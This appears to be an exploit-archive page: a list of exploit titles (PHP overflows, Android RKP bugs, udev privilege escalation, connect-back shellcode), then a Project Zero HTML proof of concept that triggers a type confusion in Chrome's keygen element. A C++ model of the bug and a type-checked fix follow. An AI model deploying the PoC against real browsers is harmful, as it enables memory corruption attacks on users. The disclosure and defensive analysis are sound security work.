
12 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)
PHP 5.3.0 - getopt() Denial of Service
PHP 5.3.0 - 'getopt()' Denial of Service
Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)
PHP 4.3.x/5.0 - openlog() Buffer Overflow
PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow
Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation
Apple WebKit - 'HTMLFormElement::reset()' Use-After Free
Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion
Apple WebKit - 'HTMLKeygenElement' Type Confusion
Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled
Google Android - RKP Information Disclosure via s2-remapping Physical Ranges
QNAP NVR/NAS - Buffer Overflow
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)
PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit
PHP 5.2.9 (Windows x86) - Local Safemod Bypass
Linux udev - Netlink Privilege Escalation (Metasploit)
Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit)
Google Android - RKP EL1 Code Loading Bypass
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Syntax Desktop 2.7 - (synTarget) Local File Inclusion
Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion
Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection
LogoStore - 'query' Parameter SQL Injection
15 lines
No EOL
646 B
HTML
Executable file
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=999 -->

<keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;">

<script>
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
</script>

<!--
What happens here:

1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript

2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.
-->
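The two points in the comment above describe a classic unchecked-downcast pattern: a helper assumes the first child of a user-agent shadow root is the element it created, and script is able to put a different node there first. The following C++ is an added illustration written for this page; it is not Blink or WebKit code and not the Chromium fix. It models a minimal DOM (hypothetical Node, SelectElement and TextNode types with a type tag), the unchecked cast beside a type-checked variant that returns nullptr on mismatch, and replays the PoC sequence (prepend a text node, then propagate `disabled`) against the checked variant.

```cpp
#include <memory>
#include <string>
#include <utility>
#include <vector>

// Hypothetical minimal DOM for this illustration; Blink's real classes differ.
enum class NodeType { Element, Text };

struct Node {
    NodeType type;
    std::string name;   // tag name for elements, text data for text nodes
    std::vector<std::unique_ptr<Node>> children;
    Node(NodeType t, std::string n) : type(t), name(std::move(n)) {}
    virtual ~Node() = default;
    Node* firstChild() const { return children.empty() ? nullptr : children.front().get(); }
    // Models what shadow_tree_container.prepend("foo") does in the PoC:
    // the new node becomes the first child of the shadow root.
    void prepend(std::unique_ptr<Node> n) { children.insert(children.begin(), std::move(n)); }
};

struct SelectElement : Node {
    bool disabled = false;
    SelectElement() : Node(NodeType::Element, "select") {}
};

struct TextNode : Node {
    explicit TextNode(std::string data) : Node(NodeType::Text, std::move(data)) {}
};

// Builds a shadow root whose first child is the <select> the element itself created.
std::unique_ptr<Node> makeKeygenShadowRoot() {
    auto root = std::make_unique<Node>(NodeType::Element, "#shadow-root");
    root->children.push_back(std::make_unique<SelectElement>());
    return root;
}

bool isSelectElement(const Node* n) {
    return n && n->type == NodeType::Element && n->name == "select";
}

// Pattern described in the PoC comment: the first child is cast to the select type
// without checking what it is. Correct only while nothing else has modified the
// shadow tree; after a text node is prepended the cast yields a pointer of the
// wrong static type (the type confusion), so it must not be called in that state.
SelectElement* shadowSelectUnchecked(Node& shadowRoot) {
    return static_cast<SelectElement*>(shadowRoot.firstChild());
}

// Hardened variant (an assumed fix shape, not the Chromium patch): confirm the
// node type before the downcast and report a mismatch the same way as a missing
// shadow root, with nullptr, which callers already have to handle.
SelectElement* shadowSelectChecked(Node& shadowRoot) {
    Node* first = shadowRoot.firstChild();
    return isSelectElement(first) ? static_cast<SelectElement*>(first) : nullptr;
}

// Models the 'keygen_element.disabled = true' step: propagate the disabled state
// to the inner select. Returns whether a select was actually updated.
bool setDisabledChecked(Node& shadowRoot, bool disabled) {
    SelectElement* select = shadowSelectChecked(shadowRoot);
    if (!select) return false;   // shadow tree was altered: do nothing rather than mis-cast
    select->disabled = disabled;
    return true;
}

// True when the shadow root's first child is a text node, i.e. the object the
// unchecked cast would have treated as a select after the PoC's prepend().
bool firstChildIsText(const Node& shadowRoot) {
    const Node* first = shadowRoot.firstChild();
    return first && first->type == NodeType::Text;
}

// Replays the PoC sequence. Returns true if the untouched tree behaves normally
// under both variants and the checked variant refuses the altered tree.
bool runScenario() {
    auto root = makeKeygenShadowRoot();
    bool before = shadowSelectChecked(*root) != nullptr
               && shadowSelectUnchecked(*root) == shadowSelectChecked(*root)
               && setDisabledChecked(*root, true);
    root->prepend(std::make_unique<TextNode>("foo"));   // the PoC's modification
    bool after = firstChildIsText(*root)
              && shadowSelectChecked(*root) == nullptr
              && !setDisabledChecked(*root, true);
    return before && after;
}
```

The defensive takeaway is the shape of `shadowSelectChecked`: any downcast of a child taken from a tree that script can reach (here via `caretRangeFromPoint()`) needs a type check, and the mismatch case should degrade to the existing "no shadow root" path instead of operating on a mistyped object.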